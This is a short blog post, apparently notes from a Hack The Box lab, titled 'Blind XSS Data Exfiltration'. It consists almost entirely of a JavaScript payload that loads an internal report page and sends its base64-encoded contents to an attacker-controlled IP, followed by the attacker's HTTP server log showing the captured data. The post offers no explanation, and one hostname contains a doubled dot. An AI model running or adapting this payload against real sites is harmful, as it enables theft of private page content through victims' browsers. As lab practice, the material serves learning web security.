sobota, 13 marca 2021

Blind XSS Data Exfiltration

cat 2.js

var xhr=new XMLHttpRequest();
xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false);
xhr.send();
var xhr2=new XMLHttpRequest();
xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false);
xhr2.send();


└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -
10.10.10.208 - - [13/Mar/2021 11:54:48] code 404, message File not found
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8dGl0bGU+U2VjdXJpdHkgUmVwb3J0PC90aXRsZT4KICA8c3R5bGU+CiAgICB0YWJsZSwgdGgsIHRkIHsKICAgICAgYm9yZGVyOiAxcHggc29saWQgYmxhY2s7CiAgICB9CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGg0PkxvZ2dlZCBYU1MgYXR0ZW1wdHM8L2g0Pgo8dGFibGU+CiAgPHRoZWFkPgogICAgPHRyPgogICAgICA8dGQ+VGltZXN0YW1wPC90ZD4KICAgICAgPHRkPlVzZXIgQWdlbnQ8L3RkPgogICAgICA8dGQ+SVAgQWRkcmVzczwvdGQ+CiAgICA8L3RyPgogIDwvdGhlYWQ+Cjx0Ym9keT4KPC90Ym9keT4KPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -